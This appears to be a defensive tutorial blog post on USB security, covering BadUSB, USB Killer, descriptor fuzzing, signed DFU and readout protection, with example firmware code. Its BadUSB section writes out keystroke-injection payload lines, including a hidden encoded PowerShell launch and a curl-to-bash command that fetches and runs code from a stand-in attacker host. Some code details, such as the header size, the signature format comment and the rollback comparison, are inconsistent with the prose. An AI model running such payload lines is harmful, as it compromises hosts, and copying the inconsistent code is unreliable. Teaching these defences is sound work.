Back to Technology

USB Part 16: Security in USB

March 31, 2026 Wasil Zafar 22 min read

Secure your USB devices and protect against USB attacks — understand BadUSB, USB Killer, descriptor injection, host-side input validation, secure DFU with firmware signing, USB authentication, and defensive design patterns.

Table of Contents

  1. The USB Attack Surface
  2. BadUSB & HID Injection
  3. USB Killer Attack
  4. Descriptor Fuzzing Defense
  5. Secure DFU — Firmware Signing
  6. Firmware Encryption for DFU
  7. USB Type-C Authentication
  8. Host-Side Input Validation
  9. Secure Boot + USB Combined
  10. USB Security Checklist
  11. Practical Exercises
  12. USB Security Audit Generator
  13. Conclusion & Next Steps

USB Development Mastery

Your 17-step learning path • Currently on Step 16
Series Context: This is Part 16 of the 17-part USB Development Mastery series. We have now covered the full software and hardware stack. In this penultimate part we turn to the adversarial perspective — understanding how USB is attacked, and how to design embedded firmware and hardware that resists those attacks.

The USB Attack Surface

USB is simultaneously one of the most useful and one of the most dangerous interfaces in computing. Its plug-and-play convenience — the very feature that made it ubiquitous — is also its greatest security weakness. The moment a USB device is plugged in, the host automatically begins enumerating it, loading drivers, and granting it access to input subsystems, storage, network adapters, and more — before any user authentication can occur.

The USB threat model has two fundamental directions. A malicious device attacking the host exploits the host's automatic trust during enumeration. A malicious host attacking the device sends crafted control requests, oversized data payloads, or lethal voltage levels to compromise or destroy the device. Both directions are real-world threats that have been demonstrated in published research and deployed attack tools.

USB Threat Model Overview

Before we examine individual attack techniques, it is useful to have a structured view of the complete threat landscape. The table below maps each threat category to its target, mechanism, and primary mitigation strategy:

Attack Type Target Mechanism Primary Mitigation
BadUSB / HID Injection Host (OS, user data) Malicious device enumerates as HID keyboard, types arbitrary commands USB device whitelisting (USBGuard), endpoint protection software
USB Rubber Ducky / Bash Bunny Host (OS) Pre-programmed HID payloads delivered in milliseconds Physical port locks, USB whitelisting, user education
USB Killer Host hardware (controller IC, motherboard) VBUS charge pump generates 200 V+ pulse, destroys USB controller TVS diodes, polyfuse, dedicated USB protection ICs — hardware only
Descriptor Fuzzing Device firmware Malicious host sends oversized or malformed descriptor requests Bounds checking in descriptor parser, TinyUSB validation, watchdog
Malicious DFU Upload Device firmware Attacker uploads unsigned firmware via DFU, replaces legitimate code ECDSA firmware signature verification in bootloader before flash
Power Attack (VBUS manipulation) Device hardware Host supplies incorrect VBUS voltage or withholds power VBUS voltage monitoring, polyfuse, TVS diode on device side
Counterfeit Cable Host and device Cable contains active electronics that intercept or inject data USB Type-C Authentication, cable inspection, certified cable procurement
Supply Chain Attack End-user host Malicious firmware installed at manufacture; device appears legitimate Firmware signing verification, binary attestation, USB-IF certification

The boundary between hardware and firmware attacks is important: hardware attacks (USB Killer, power manipulation) cannot be mitigated in software. Firmware attacks (descriptor fuzzing, malicious DFU) can be defended at the code level but require deliberate engineering effort — they are not automatically handled by most USB stacks.

BadUSB & HID Injection

BadUSB is the name given to the class of attack, first publicly documented by Karsten Nohl and Jakob Lell at Black Hat USA 2014, where a USB device is reprogrammed to impersonate a different device class than it appears to be. The most common and immediately dangerous variant is HID keyboard injection: the malicious device enumerates as a USB HID keyboard and immediately begins "typing" a pre-programmed payload into the host OS.

How HID Keystroke Injection Works

The USB HID keyboard descriptor is a well-documented, standardised structure. Any device that presents a valid HID keyboard descriptor — including the boot protocol entries — will be accepted by every major OS (Windows, Linux, macOS) without any additional driver installation or user permission. The OS treats the device's keystroke reports identically to a legitimate keyboard.

The attack payload is essentially a script written in the target OS's scripting language (PowerShell, Bash, AppleScript) that is "typed" character by character at the maximum rate the HID polling interval allows. At the default 1 ms HID polling rate, a 1,000-character payload can be delivered in under two seconds. Typical payloads:

  • Windows: Win+Rpowershell -NoP -W Hidden -Enc <base64 payload> → Enter. The PowerShell command downloads and executes a reverse shell, persistence mechanism, or data exfiltration script.
  • Linux: Ctrl+Alt+T to open a terminal → curl http://attacker.com/payload.sh | bash → Enter.
  • macOS: Cmd+Space → type "Terminal" → Enter → drop the payload bash command.

Commercial Attack Tools

The USB Rubber Ducky (Hak5) is a USB device in the form factor of a USB thumb drive that runs a scripting language called Ducky Script. It is explicitly marketed as a penetration testing tool. The Bash Bunny (also Hak5) is a more capable successor that can emulate multiple USB devices simultaneously (keyboard + mass storage + network adapter) and runs full Linux payloads from a micro-SD card. Both devices cost less than $100 and are available commercially.

Host-Side Defenses

The primary defense against HID injection on the host side is USB device whitelisting — a policy that allows only devices with known, trusted USB Vendor ID (VID) and Product ID (PID) combinations to enumerate fully. On Linux, USBGuard is the de-facto tool for this; it enforces a policy file specifying which devices are permitted and can block new devices by default until explicitly approved. On Windows, Endpoint Protector, USB Lock RP, and Microsoft's own Defender for Endpoint USB device control policies provide equivalent functionality.

Your Device Could Be Perceived as BadUSB: If your legitimate embedded device presents a HID keyboard or composite HID interface, corporate endpoint protection software may block it entirely, quarantine the user's machine, or trigger a security incident. Always use a registered VID/PID pair from the USB-IF, document the device's HID capabilities in your product documentation, and consider offering a non-HID variant for enterprise deployments.

Device-Side Awareness: Your Firmware Is a Weapon

From the device developer's perspective, HID injection awareness means understanding that the exact same firmware capabilities you write for legitimate purposes — sending keystrokes from a keyboard matrix, for example — can be repurposed maliciously if the device is compromised via DFU, supply chain attack, or physical access. This is why DFU security (covered in Sections 5 and 6) is so critical: an unsigned DFU endpoint is a remotely exploitable backdoor into the device's HID behavior.

USB Killer Attack

The USB Killer is a device that draws power from VBUS, uses an internal charge pump (a DC-DC boost converter) to charge capacitors to over 200 V, and then discharges that voltage back through the VBUS and data lines into the host's USB controller. The discharge cycle repeats several times per second. The high-voltage pulse destroys the USB controller IC, and depending on the board layout and ESD protection elsewhere on the PCB, may propagate to destroy the main CPU, memory, and power management ICs.

The original USB Kill v2.0 device generates a -200 V pulse on the data lines. The USB Kill v3.0 added a "test shield" accessory that measures the generated voltage without destroying the target device, for "testing" purposes. Commercial versions are sold openly. Malicious use has resulted in documented cases of laptop, desktop, and industrial computer destruction with repair costs in the thousands of dollars per device.

Why Software Cannot Defend Against USB Killer

The attack operates entirely at the electrical level. The host's USB controller IC — the silicon between the USB connector and the CPU — is the first component in the signal path. The destructive pulse arrives and destroys the USB controller before any software, kernel driver, or security policy has any opportunity to execute. No amount of OS-level USB whitelisting, endpoint protection, or driver hardening provides any protection whatsoever.

Hardware Defense Strategies

All defenses against USB Killer are hardware-level and must be designed into the PCB before the product ships. There is no retrofit option:

  • TVS Diode Arrays: A bidirectional TVS diode (Transient Voltage Suppressor) on VBUS rated for greater than 100 V transient will clamp the destructive pulse. The TVS must be placed physically close to the USB connector — before any PCB trace runs toward sensitive circuitry. The ST USBLC6-2SC6 is rated for ±8 kV ESD (IEC 61000-4-2) but only 17 V clamping voltage, which is insufficient for USB Killer alone. For USB Killer protection, pair a low-capacitance TVS on D+/D- with a higher-voltage VBUS protection component.
  • Polyfuse on VBUS: A resettable polyfuse (PPTC — Positive Temperature Coefficient) in series with VBUS limits sustained current. A 500 mA polyfuse (e.g., Bourns MF-MSMF050) will open when overloaded. While it does not clamp voltage spikes, it limits the energy available to the charge pump, reducing the effectiveness of repeated discharge cycles.
  • Dedicated USB Protection ICs: The ST USBLC6-2SC6 provides ESD protection on D+/D- lines specifically for USB. The TI TPD4S012 provides VBUS overvoltage protection with a built-in load switch that disconnects the USB lines when VBUS exceeds a configurable threshold (5.8 V typical). This is the most robust single-component solution: it disconnects the USB lines from the rest of the circuit before a destructive pulse can propagate.
  • Galvanic Isolation: For industrial applications, USB isolation ICs (e.g., Analog Devices ADuM4160) provide complete electrical isolation between the USB connector and the device circuitry. They pass USB signals magnetically, not electrically. No VBUS surge can cross the isolation barrier. The trade-off is cost (isolation ICs cost $5–$15 per unit) and the limit to Full Speed (12 Mbit/s) USB.
PCB Layout Note: Protection components must be placed as close as possible to the USB connector — ideally within 1–2 mm of the connector pins. Any PCB trace between the connector and the protection component is an unprotected conductor. Route VBUS through the polyfuse first, then the TVS diode, before any trace branches toward the rest of the circuit.

Descriptor Fuzzing Defense

Descriptor fuzzing is the attack technique where a malicious host sends deliberately malformed USB control requests during or after enumeration. The attacker's goal is to trigger buffer overflows, assert failures, or undefined behavior in the device's descriptor parsing code — potentially allowing arbitrary code execution on the device, or at minimum causing a crash that breaks the device's legitimate functionality.

Common Fuzzing Payloads

Typical fuzzing payloads that target USB device firmware include:

  • Oversized wTotalLength in a Configuration Descriptor: The wTotalLength field specifies how many bytes follow the configuration descriptor header. A fuzzed value of 0xFFFF will cause a naive parser to read 65,535 bytes from a buffer that may only be 256 bytes long — a textbook buffer overflow.
  • Wrong bNumInterfaces: Setting bNumInterfaces to 255 causes a parser that iterates over interfaces without bounds checking to walk off the end of the descriptor memory region.
  • Mismatched bLength: Setting individual descriptor bLength values to zero or values larger than the remaining descriptor buffer causes pointer arithmetic errors in length-based parsers.
  • Illegal bDescriptorType values: Values outside the defined range (0x00–0x0F for standard descriptors, 0x20–0x2F for class-specific) should be silently rejected, but buggy parsers may crash or take unintended code paths.
  • GET_DESCRIPTOR for non-existent descriptor index: Requesting string descriptor index 255 when only indices 0–3 are defined should return a STALL, not a buffer read at an arbitrary offset.

TinyUSB's Defense Posture

TinyUSB implements bounds checking in its descriptor parsing routines. The core descriptor walking code (tu_desc_next()) advances by bLength bytes and checks that the resulting pointer is still within the total descriptor buffer before dereferencing it. When running a debug build (without NDEBUG defined), TinyUSB uses TU_ASSERT() macros that halt execution with a diagnostic message on any bounds violation — making fuzzing bugs immediately visible during development.

/* ---------------------------------------------------------------
 * TinyUSB descriptor walking — safe iteration pattern
 * tu_desc_next() returns pointer to next descriptor or NULL
 * ---------------------------------------------------------------*/

/* Iterate over all interface descriptors in a configuration */
void parse_config_descriptor(const uint8_t *p_desc, uint16_t total_len)
{
    const uint8_t *p_end = p_desc + total_len;
    const uint8_t *p     = p_desc;

    while (p < p_end)
    {
        /* Guard: bLength must be at least 2 (bLength + bDescriptorType) */
        if (p[0] < 2) {
            /* Malformed descriptor — bLength is zero or one. Abort parsing. */
            TU_LOG1("Descriptor fuzzing: bLength=%u at offset %u — aborting\r\n",
                    p[0], (unsigned)(p - p_desc));
            return;
        }

        /* Guard: descriptor must not extend past the end of the buffer */
        if ((p + p[0]) > p_end) {
            TU_LOG1("Descriptor fuzzing: descriptor extends past total_len — aborting\r\n");
            return;
        }

        uint8_t type = p[1];
        switch (type)
        {
            case TUSB_DESC_INTERFACE:
                /* Safe: we already verified p[0] >= 2 and p+p[0] <= p_end */
                handle_interface_descriptor((tusb_desc_interface_t const *)p);
                break;

            case TUSB_DESC_ENDPOINT:
                handle_endpoint_descriptor((tusb_desc_endpoint_t const *)p);
                break;

            default:
                /* Unknown or class-specific descriptor — skip it safely */
                break;
        }

        p = tu_desc_next(p);  /* Advances by p[0] bytes (bLength) */
    }
}

Hardening TinyUSB for Production

In a development build, keep NDEBUG undefined (asserts active) so that descriptor fuzzing bugs are caught immediately during testing. In production firmware, after all descriptor tests pass, you have a choice: enable NDEBUG for size/speed, but replace the assert-triggered halts with graceful STALL responses or watchdog-triggered resets. The device should never expose a crash (infinite loop, undefined behavior) to an attacker — a clean watchdog reset is always preferable.

The usbfuzz tool (an open-source fuzzer that runs on a Linux host with a programmable USB controller such as a FaceDancer board) can systematically generate malformed descriptor requests. Testing your device firmware against usbfuzz before shipping is a low-cost, high-value security activity that takes a few hours and catches the majority of descriptor parsing bugs.

Secure DFU — Firmware Signing

Device Firmware Upgrade (DFU) is the USB class protocol that allows a host to upload new firmware to a device over USB. In an unsigned DFU implementation — which is the default for nearly all development-stage firmware — any attacker with USB access to the device can upload arbitrary firmware. The legitimate bootloader will accept and flash it without question. This is one of the most underappreciated security vulnerabilities in the embedded world: a device with an open DFU port is effectively fully compromised the moment it is connected to a hostile computer.

Signing Approach: ECDSA P-256

The industry-standard approach for firmware signing in constrained embedded environments is ECDSA (Elliptic Curve Digital Signature Algorithm) with the P-256 curve (also known as secp256r1 or prime256v1). ECDSA P-256 provides 128-bit equivalent security with a 64-byte signature and a 64-byte public key — compact enough for flash-constrained devices, and fast enough to verify on a Cortex-M4 in under 100 ms without hardware acceleration.

The signing workflow is:

  1. Build the firmware binary (firmware.bin).
  2. Compute SHA-256 hash of the complete firmware binary.
  3. Sign the SHA-256 hash using the developer's ECDSA P-256 private key (signing_key.pem), producing a 64-byte signature.
  4. Append a 96-byte signed header to the firmware image: [magic(4)] [version(4)] [length(4)] [sha256(32)] [signature(64)] [padding(8 to align)] .
  5. Upload the signed firmware image (binary + header) to the device via DFU.

The bootloader verification workflow is:

  1. Receive the firmware image from the host via DFU_DNLOAD requests (written to a staging area in flash, not directly to the application area).
  2. After DFU_DNLOAD completes, parse the header from the received image.
  3. Verify the magic number and sanity-check the length field.
  4. Compute SHA-256 over the firmware payload (excluding the header).
  5. Call verify_signature() using the public key embedded in the bootloader.
  6. If verification passes: erase the application flash region and copy the firmware payload. If verification fails: STALL all subsequent DFU requests and set an error state.
/* ---------------------------------------------------------------
 * Secure DFU bootloader — firmware signature verification
 * Uses micro-ecc library (uECC) for ECDSA P-256
 * Public key is embedded in read-only flash (Option Bytes protected region)
 * ---------------------------------------------------------------*/

#include "uECC.h"
#include "sha256.h"

/* Public key — 64 bytes (uncompressed P-256, without 0x04 prefix) */
/* In production: store in OTP / write-protected flash page           */
static const uint8_t BOOTLOADER_PUBLIC_KEY[64] = {
    /* X component (32 bytes) */
    0x6b, 0x17, 0xd1, 0xf2, 0xe1, 0x2c, 0x42, 0x47,
    0xf8, 0xbc, 0xe6, 0xe5, 0x63, 0xa4, 0x40, 0xf2,
    0x77, 0x03, 0x7d, 0x81, 0x2d, 0xeb, 0x33, 0xa0,
    0xf4, 0xa1, 0x39, 0x45, 0xd8, 0x98, 0xc2, 0x96,
    /* Y component (32 bytes) */
    0x4f, 0xe3, 0x42, 0xe2, 0xfe, 0x1a, 0x7f, 0x9b,
    0x8e, 0xe7, 0xeb, 0x4a, 0x7c, 0x0f, 0x9e, 0x16,
    0x2b, 0xce, 0x33, 0x57, 0x6b, 0x31, 0x5e, 0xce,
    0xcb, 0xb6, 0x40, 0x68, 0x37, 0xbf, 0x51, 0xf5
};

/* Firmware image header prepended to every signed image */
typedef struct __attribute__((packed)) {
    uint32_t magic;          /* 0xDEADBEEF — identifies a signed image    */
    uint32_t version;        /* Firmware version (used for downgrade check)*/
    uint32_t firmware_len;   /* Length of the firmware payload in bytes    */
    uint8_t  sha256[32];     /* SHA-256 of the firmware payload            */
    uint8_t  signature[64];  /* ECDSA P-256 signature over sha256[]        */
} FirmwareHeader_t;

/* ---------------------------------------------------------------
 * verify_signature() — call after DFU_DNLOAD completes
 * staging_buf: pointer to received image (header + firmware)
 * total_len:   total bytes received
 * Returns: true if signature is valid, false otherwise
 * ---------------------------------------------------------------*/
bool verify_signature(const uint8_t *staging_buf, uint32_t total_len)
{
    const FirmwareHeader_t *hdr = (const FirmwareHeader_t *)staging_buf;
    const uint8_t *firmware_payload = staging_buf + sizeof(FirmwareHeader_t);
    uint8_t computed_hash[32];

    /* 1. Verify magic number */
    if (hdr->magic != 0xDEADBEEFUL) {
        TU_LOG1("DFU: invalid magic 0x%08lX\r\n", (unsigned long)hdr->magic);
        return false;
    }

    /* 2. Sanity-check firmware length */
    if (hdr->firmware_len == 0 ||
        hdr->firmware_len > APP_FLASH_SIZE ||
        sizeof(FirmwareHeader_t) + hdr->firmware_len != total_len) {
        TU_LOG1("DFU: firmware_len mismatch\r\n");
        return false;
    }

    /* 3. Compute SHA-256 over firmware payload */
    sha256_context ctx;
    sha256_init(&ctx);
    sha256_update(&ctx, firmware_payload, hdr->firmware_len);
    sha256_final(&ctx, computed_hash);

    /* 4. Verify computed hash matches header hash */
    if (memcmp(computed_hash, hdr->sha256, 32) != 0) {
        TU_LOG1("DFU: SHA-256 mismatch — corrupted image\r\n");
        return false;
    }

    /* 5. Verify ECDSA signature */
    const struct uECC_Curve_t *curve = uECC_secp256r1();
    int result = uECC_verify(BOOTLOADER_PUBLIC_KEY,
                             hdr->sha256,      /* message hash */
                             32,               /* hash length  */
                             hdr->signature,   /* DER signature */
                             curve);

    if (result != 1) {
        TU_LOG1("DFU: ECDSA signature verification FAILED\r\n");
        return false;
    }

    TU_LOG1("DFU: signature verified OK — firmware v%lu\r\n",
            (unsigned long)hdr->version);
    return true;
}

/* ---------------------------------------------------------------
 * tud_dfu_download_cb() — called by TinyUSB DFU class driver
 * when host sends DFU_DNLOAD with wBlockNum==0 and wLength==0
 * (indicating end of download)
 * ---------------------------------------------------------------*/
void tud_dfu_finish_flashing(uint8_t alt)
{
    (void)alt;

    if (!verify_signature(dfu_staging_buffer, dfu_bytes_received)) {
        /* Reject: STALL all further DFU requests */
        tud_dfu_finish_flashing_failed(0x07); /* errVENDOR */
        return;
    }

    /* Signature OK: copy firmware to application flash */
    flash_program_firmware(dfu_staging_buffer + sizeof(FirmwareHeader_t),
                           dfu_bytes_received - sizeof(FirmwareHeader_t));
    tud_dfu_finish_flashing_done();
}
Key Management: The private signing key must never be stored on the device or in the build system without proper protection. Use a Hardware Security Module (HSM) for signing in production. The CI/CD pipeline should invoke the HSM API to sign firmware images — never export the raw private key to a build server or developer machine.

Firmware Encryption for DFU

Firmware signing (Section 5) prevents an attacker from uploading malicious firmware — it does not prevent an attacker from reading your firmware. If the DFU protocol allows the host to upload a firmware image and that image is unencrypted, a competitor or reverse engineer can capture the image and analyze your proprietary algorithms. Firmware encryption addresses this threat.

Encryption Scheme: AES-128-CBC

AES-128-CBC (Advanced Encryption Standard, 128-bit key, Cipher Block Chaining mode) is the standard choice for firmware encryption in embedded systems. It is supported in hardware by STM32's AES peripheral (available on STM32L4, STM32G4, STM32H7), making decryption fast (typically 50–100 MB/s) with minimal MCU load. The 128-bit key provides 128-bit security — overkill for most commercial products but standard practice for compliant systems.

Combined Encrypt-then-Sign

The correct order of operations is encrypt first, then sign. The signed header contains the SHA-256 hash of the encrypted ciphertext, not the plaintext. This ensures:

  • The signature covers exactly what is transmitted — if the encrypted payload is tampered with, signature verification fails.
  • The bootloader verifies the signature on the ciphertext before decrypting — no decryption work is wasted on tampered images.
  • An attacker cannot perform a "sign then encrypt" attack where they sign a malicious plaintext firmware and then re-encrypt it with the device key.

The bootloader workflow becomes: receive encrypted+signed image → verify ECDSA signature → decrypt AES-128-CBC → write plaintext firmware to application flash.

Key Storage Options

The AES decryption key must be stored on the device. The security of the entire encryption scheme depends entirely on the security of this key storage. Options in order of security:

  • OTP Flash (One-Time Programmable): STM32 devices have OTP memory pages that can be written once and become permanently read-only. Store the AES key here. RDP Level 2 (Section 9) prevents the key from being read via debug interfaces. Cost: zero, already on-chip.
  • Dedicated Hardware Security Element (Microchip ATECC608A): A secure element connected via I2C. The AES key never leaves the chip — the bootloader sends ciphertext to the ATECC608A over I2C and receives plaintext back. Physical attacks (decapping, fault injection) trigger a tamper response that zeroizes the key. Cost: approximately $0.50 per unit in volume.
  • STM32 TrustZone (Cortex-M33, e.g., STM32L5, STM32U5): The Secure world (running in the Secure Processing Environment) holds the key and the decryption logic. The Non-Secure bootloader cannot access Secure-world memory. Requires ARM TrustZone-M programming model. Cost: select a TrustZone-enabled MCU variant.

Downgrade Attack Prevention

Encryption and signing alone do not prevent downgrade attacks, where an attacker re-uploads an older, legitimately signed firmware version that contains a known vulnerability. Defense: include a firmware version number in the signed header. The bootloader stores the highest version number ever installed (in OTP flash or EEPROM) and rejects any firmware image with a version number lower than or equal to the stored minimum. This is called a monotonic counter or rollback protection counter.

/* ---------------------------------------------------------------
 * Downgrade attack prevention — version rollback check
 * Stored in OTP flash (written once per firmware update)
 * ---------------------------------------------------------------*/

#define OTP_FIRMWARE_VERSION_ADDR   0x1FFF7000UL  /* STM32F4 OTP base */

uint32_t get_minimum_allowed_version(void)
{
    /* Read the highest version number ever flashed from OTP */
    return *((volatile uint32_t *)OTP_FIRMWARE_VERSION_ADDR);
}

bool check_version_rollback(uint32_t incoming_version)
{
    uint32_t min_version = get_minimum_allowed_version();

    /* OTP erased state is 0xFFFFFFFF — treat as "no minimum set" */
    if (min_version == 0xFFFFFFFFUL) {
        return true;  /* First firmware flash — allow any version */
    }

    if (incoming_version < min_version) {
        TU_LOG1("DFU: rollback rejected — incoming v%lu < min v%lu\r\n",
                (unsigned long)incoming_version,
                (unsigned long)min_version);
        return false;
    }
    return true;
}

void update_minimum_version(uint32_t new_version)
{
    uint32_t current_min = get_minimum_allowed_version();
    if (new_version > current_min) {
        /* Write new minimum to OTP — irreversible, one-time operation */
        HAL_FLASH_Unlock();
        HAL_FLASH_Program(FLASH_TYPEPROGRAM_WORD,
                          OTP_FIRMWARE_VERSION_ADDR,
                          new_version);
        HAL_FLASH_Lock();
    }
}

USB Type-C Authentication

The USB Authentication Specification (published by the USB Implementers Forum, revision 1.0 and later 1.3) defines a cryptographic challenge-response protocol that allows USB hosts, devices, and cables to authenticate each other before data transfer or power delivery begins. It uses the USB Power Delivery protocol layer (BMC-encoded messages on the CC1/CC2 pins) as the transport for the authentication exchange.

How USB Authentication Works

The authentication protocol is built on a PKI (Public Key Infrastructure) certificate chain, similar in concept to TLS certificates in web browsers:

  1. The Initiator (typically the host) sends a GET_DIGESTS message, requesting a hash of the certificate chain stored in the Responder (device or cable).
  2. The Initiator retrieves the full GET_CERTIFICATE chain (a sequence of X.509-like certificates, rooted in the USB-IF CA).
  3. The Initiator sends a CHALLENGE containing a 32-byte nonce.
  4. The Responder computes ECDSA-P256(SHA-256(nonce || certificate_digest)) using its private key and returns the 64-byte signature in a CHALLENGE_AUTH response.
  5. The Initiator verifies the signature against the public key extracted from the certificate chain. If verification succeeds, the device is authenticated as genuine.

Primary Use Cases

The USB Authentication Specification was designed with three primary use cases in mind:

  • Cable Authentication: A USB-C cable containing an active EMARKER chip can be authenticated as a genuine, certified cable. This prevents counterfeit cables from falsely claiming high-power (100 W+) or high-speed (USB 3.2, USB4) capabilities.
  • Charger Authentication: A USB-C Power Delivery charger can be authenticated, preventing counterfeit chargers from masquerading as genuine OEM accessories.
  • Device Authentication: A peripheral device can present a certificate, allowing the host to verify it is genuine before allowing sensitive operations (e.g., Apple MFi, which uses a variant of this concept).

Deployment Status in Embedded Devices

As of 2026, USB Type-C Authentication is not yet widely deployed in most custom embedded devices. The primary barrier is the requirement for a certificate issued by the USB-IF CA, which requires USB-IF membership and certification fees. The protocol is, however, well-supported in chipset silicon from Cypress (EZ-PD), Renesas (uPD350), and others that include the protocol in hardware. For most embedded device developers, the practical focus should be on DFU signing (Section 5) as the primary DFU security mechanism, with USB Authentication as a future-proofing consideration for products that require cable or charger authentication.

Host-Side Input Validation

When we think of USB security, we naturally think of the device attacking the host. But the reverse is equally important: your USB device receives data from a host that may be hostile. In an industrial environment, a device may be plugged into a compromised workstation. In a security-critical product (USB security key, encrypted storage, industrial controller), the device must treat all host-provided data as potentially malicious.

Common Device-Side Vulnerabilities

  • Buffer overflow via oversized BULK OUT writes: The MSC (Mass Storage Class) write callback receives a sector buffer from the host. If your callback copies host-provided data without validating the transfer length against the destination buffer size, an oversized write creates a stack or heap overflow on the device.
  • Command injection via CDC control requests: If your CDC device acts on CDC class-specific control requests (SET_LINE_CODING, SET_CONTROL_LINE_STATE) to configure hardware, and those requests are not validated, a malicious host can configure peripheral hardware into undefined states.
  • Integer overflow in custom class drivers: A wLength field in a custom control request of 0xFFFF, processed without validation, can cause integer overflow in buffer size calculations — a common source of heap overflow vulnerabilities.
  • Denial of service via rapid control request flooding: The USB host can send control requests (SETUP packets) at a very high rate. Without rate limiting, a hostile host can monopolize the device's CPU in control request processing, starving all other real-time tasks.

Safe Input Validation Pattern

/* ---------------------------------------------------------------
 * Safe MSC write callback — validates all inputs before copying
 * Called by TinyUSB MSC class driver for every SCSI WRITE command
 * lba:       Logical Block Address (sector number)
 * offset:    Byte offset within the transfer (for multi-packet writes)
 * buffer:    Host-provided data buffer
 * bufsize:   Number of bytes in this callback invocation
 * ---------------------------------------------------------------*/

#define SECTOR_SIZE         512U
#define STORAGE_SECTOR_COUNT 16384U  /* 8 MB flash storage */

/* Our static sector buffer — must NEVER be overwritten outside bounds */
static uint8_t g_write_sector_buf[SECTOR_SIZE];

int32_t tud_msc_write10_cb(uint8_t lun, uint32_t lba,
                            uint32_t offset, uint8_t *buffer,
                            uint32_t bufsize)
{
    (void)lun;

    /* --- Validation 1: LBA within storage range --- */
    if (lba >= STORAGE_SECTOR_COUNT) {
        TU_LOG1("MSC write: LBA %lu out of range (max %lu)\r\n",
                (unsigned long)lba,
                (unsigned long)(STORAGE_SECTOR_COUNT - 1));
        return -1;  /* Causes TinyUSB to return SCSI CHECK CONDITION */
    }

    /* --- Validation 2: offset within sector bounds --- */
    if (offset >= SECTOR_SIZE) {
        TU_LOG1("MSC write: offset %lu >= SECTOR_SIZE\r\n",
                (unsigned long)offset);
        return -1;
    }

    /* --- Validation 3: bufsize does not exceed remaining sector space --- */
    uint32_t remaining = SECTOR_SIZE - offset;
    if (bufsize > remaining) {
        TU_LOG1("MSC write: bufsize %lu exceeds remaining %lu bytes\r\n",
                (unsigned long)bufsize, (unsigned long)remaining);
        return -1;
    }

    /* --- Validation 4: buffer pointer is not NULL --- */
    if (buffer == NULL) {
        return -1;
    }

    /* All validations passed — safe to copy */
    memcpy(g_write_sector_buf + offset, buffer, bufsize);

    /* If this is the last packet for this sector, flush to storage */
    if (offset + bufsize == SECTOR_SIZE) {
        flash_write_sector(lba, g_write_sector_buf);
    }

    return (int32_t)bufsize;
}

/* ---------------------------------------------------------------
 * Rate-limited control request handler
 * Prevents DoS via control request flooding
 * ---------------------------------------------------------------*/
static uint32_t g_last_ctrl_req_tick = 0;
#define CTRL_REQ_MIN_INTERVAL_MS  5U   /* Max 200 control requests/second */

bool tud_vendor_control_xfer_cb(uint8_t rhport, uint8_t stage,
                                 tusb_control_request_t const *req)
{
    uint32_t now = get_system_tick_ms();

    /* Rate limiting: reject if requests arrive faster than interval */
    if ((now - g_last_ctrl_req_tick) < CTRL_REQ_MIN_INTERVAL_MS) {
        TU_LOG1("Control request rate limit exceeded — STALL\r\n");
        tud_control_stall(rhport);
        return true;
    }
    g_last_ctrl_req_tick = now;

    /* Validate wLength before reading data phase */
    if (req->wLength > MAX_VENDOR_CTRL_PAYLOAD) {
        TU_LOG1("Control request wLength %u exceeds max %u — STALL\r\n",
                req->wLength, MAX_VENDOR_CTRL_PAYLOAD);
        tud_control_stall(rhport);
        return true;
    }

    /* ... process valid request ... */
    return true;
}

Watchdog Recovery

If an attacker manages to get the device firmware into an unexpected state through malformed protocol messages, a hardware watchdog timer is the last line of defense. Configure the watchdog with a timeout appropriate to your application (typically 100–500 ms for a USB device that handles requests continuously). The main loop or USB task scheduler must kick the watchdog regularly. Any state that hangs the device — including a deliberately induced deadlock via protocol manipulation — will trigger a clean reset, restoring device functionality.

Secure Boot + USB Combined

Secure DFU firmware signing is only half of the story. Even with signed DFU, an attacker with physical access to the device and JTAG/SWD debug port access can bypass the bootloader entirely — reading out flash contents, writing arbitrary firmware at the hardware level, or extracting cryptographic keys from RAM. Readout Protection (RDP) on STM32 microcontrollers is the hardware mechanism that prevents this.

STM32 RDP Levels

RDP Level JTAG/SWD Debug Flash Read via Debug SRAM Access System Bootloader DFU Upgrade Path
Level 0 (default) Fully enabled Yes — full flash access Full read/write Fully functional Any direction (0→1→2)
Level 1 Disabled during user code execution No — blocked by hardware Limited: only during debug halt Blocked (cannot read flash via DFU) 1→0 causes mass erase; 1→2 allowed
Level 2 (permanent) Permanently disabled — irreversible No — hardware enforced No debug access Blocked completely Cannot downgrade — permanent

For production hardware, RDP Level 2 is the correct choice. It permanently disables all debug interfaces and prevents any flash readout or hardware-level firmware modification. The trade-off is that it is irreversible: if the bootloader or production firmware contains a critical bug, there is no recovery path via debug. This means the secure DFU mechanism must be thoroughly tested before RDP Level 2 is set.

Setting RDP Level 2 via Option Bytes

/* ---------------------------------------------------------------
 * Set STM32 RDP Level 2 — IRREVERSIBLE — production use only
 * Call this function ONCE during manufacturing finalization
 * after all firmware has been loaded and verified
 * ---------------------------------------------------------------*/
void set_rdp_level2_permanent(void)
{
    FLASH_OBProgramInitTypeDef ob_init = {0};

    /* First: read current option bytes state */
    HAL_FLASHEx_OBGetConfig(&ob_init);

    /* Check if already at Level 2 */
    if (ob_init.RDPLevel == OB_RDP_LEVEL_2) {
        /* Already set — nothing to do */
        return;
    }

    /* Unlock option bytes */
    HAL_FLASH_Unlock();
    HAL_FLASH_OB_Unlock();

    /* Set RDP Level 2 */
    ob_init.OptionType = OPTIONBYTE_RDP;
    ob_init.RDPLevel   = OB_RDP_LEVEL_2;  /* 0xCC in the option byte */

    HAL_FLASHEx_OBProgram(&ob_init);

    /* Launch option byte loading — causes system reset */
    HAL_FLASH_OB_Launch();

    /* Should not reach here — HAL_FLASH_OB_Launch() resets the MCU */
    while (1) {}
}

Custom DFU Entry Point Without BOOT0

The STM32 system bootloader (activated by pulling BOOT0 high at reset) is blocked at RDP Level 1 and above, as intended. But your custom DFU bootloader — stored in your own user flash — is still operational. The key is to enter the bootloader only through a controlled software trigger, not through the BOOT0 pin exposed externally on the PCB. Recommended patterns:

  • Magic word in RAM: Set a magic value (e.g., 0xDEADC0DE) in a RAM location that persists across a software reset (in the .noinit section, outside the zero-initialized region). The bootloader checks this word on every startup. If it matches, enter DFU mode; if not, boot the application.
  • Button hold at power-on: Check a dedicated "DFU entry" button at boot. If held, enter DFU mode. Never expose BOOT0 externally in production hardware.
  • Remote DFU trigger via authenticated command: A special vendor control request (protected by a challenge-response HMAC) tells the application firmware to write the magic word and trigger a software reset into the bootloader.

USB Security Checklist

Use this checklist during design review and pre-production sign-off to ensure all USB security considerations have been addressed. Each item should be assigned an owner and a target implementation date.

Security Item Risk Level Implementation Verification Method
